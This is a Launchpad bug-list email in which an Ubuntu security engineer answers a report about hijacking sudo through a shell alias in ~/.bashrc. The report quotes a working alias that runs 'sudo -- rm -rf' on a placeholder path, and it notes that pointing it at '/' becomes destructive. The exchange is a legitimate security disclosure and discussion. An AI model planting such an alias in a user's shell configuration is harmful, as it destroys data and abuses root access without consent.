[Bug 1893241] Re: attack alias sudo with nasty payload

Seth Arnold 1893241 at bugs.launchpad.net
Fri Aug 28 22:29:27 UTC 2020 

Hello Patrik, thanks for your concern for Ubuntu's security.

As you said, there are numerous possibilities for trouble when an
account is compromised in this fashion. Placing malicious versions of
utilities into ~/bin is another common choice. (Usually shell aliases,
functions, and ~/bin/ replacements of common utilities is in the realm
of "students playing practical jokes on each other when they first use
Unix systems".)

Consider a slight modification of your function, to call it 'ls' or 'mv'
or 'cat'. Would it be any less dangerous? If the user used sudo in that
terminal recently, it's bad news. If the user didn't authenticate to
sudo recently they will be prompted for a password, they may wonder why,
and start to investigate. How? With 'vi'? With 'cat'? With 'alias'? Each
of those could also do other malicious things.

A more enterprising attacker with the ability to modify user files could
install a keylogger, or cause shell sessions to start with script(1) or
similar utilities, or use ptrace-based debugging techniques to read
secrets from user processes, etc. These would be more reliable and
harder to spot.

On Ubuntu, it is a convention that the first user account on the
computer gets sudo access; while this is very convenient, it's also a
risk. It is also common for higher-security environments for one person
to have multiple accounts: one used for administrative actions and one
used for their personal work on the computer.

It is also important to recall that root access is not necessarily the
most important goal of an attacker. Computers work with a wide variety
of data from a wide variety of sources and threats like cryptolockers or
data exfiltration often doesn't need root privileges to be
catastrophically bad for a user or an organization.

There's no simple solution to address what you've found. It used to be
common for system administrators to run periodic checks of all user
files to make sure permissions made sense, there was nothing malicious
in them, etc. (This was my introduction to Unix security in the 90s; an
ircii plugin I had downloaded added '+ +' to my ~/.rhosts file. It was
spotted by the sysadmin a few hours later thanks to an automated tool.)

In addition to checking for too-wide write permissions, also be sure to
protect your account with good, high-quality, passwords, and disable
password authentication where you can, so you can rely upon ssh
authorized_keys instead. Lock your screen before suspending your laptop
or walking away from your desktop. Be careful with what USB and Firewire
devices you plug into your computer. And so on.

We can't realistically try to handle "someone has write access to my
home directory" as a threat model. If someone has write access to your
home directory they can do a great deal of damage.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1893241

Title:
  attack alias sudo with nasty payload

Status in bash package in Ubuntu:
  Won't Fix

Bug description:
  Put the alias below in ~/.bashrc, which is writable by the current
  user and wait for the user to open up a shell and become root.

  There are numerous of possibilities. If you exchange
  "/tmp/aBSoLuTLYNoTHiNG" to "/" it becomes dangerous. Or imagine an
  attacker that can't become a root in any other way and wants to setup
  a botnet.

  $ alias sudo='function f() { sudo -- rm -rf  "/tmp/aBSoLuTLYNoTHiNG" ; sudo touch "/tmp/aBSoLuTLYNoTHiNG" ; echo "Everything removed!!" ;  sudo "$@" ; } ; f "$@"'
  $ stat /tmp/aBSoLuTLYNoTHiNG 
  stat: cannot stat '/tmp/aBSoLuTLYNoTHiNG': No such file or directory
  $ sudo echo 'hello wonderful world!'
  Everything removed!!
  hello wonderful world!
  $ stat /tmp/aBSoLuTLYNoTHiNG 
    File: /tmp/aBSoLuTLYNoTHiNG
    Size: 0         	Blocks: 0          IO Block: 4096   regular empty file
  Device: fd00h/64768d	Inode: 4718664     Links: 1
  Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2020-08-27 18:09:50.960080579 +0200
  Modify: 2020-08-27 18:09:50.960080579 +0200
  Change: 2020-08-27 18:09:50.960080579 +0200
   Birth: -

  File written by root! Fastest fix: Sudo is not allowed to be an alias.

  Extra information:
  $ lsb_release -rd
  Description:	Ubuntu 20.04.1 LTS
  Release:	20.04

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1893241/+subscriptions

More information about the foundations-bugs mailing list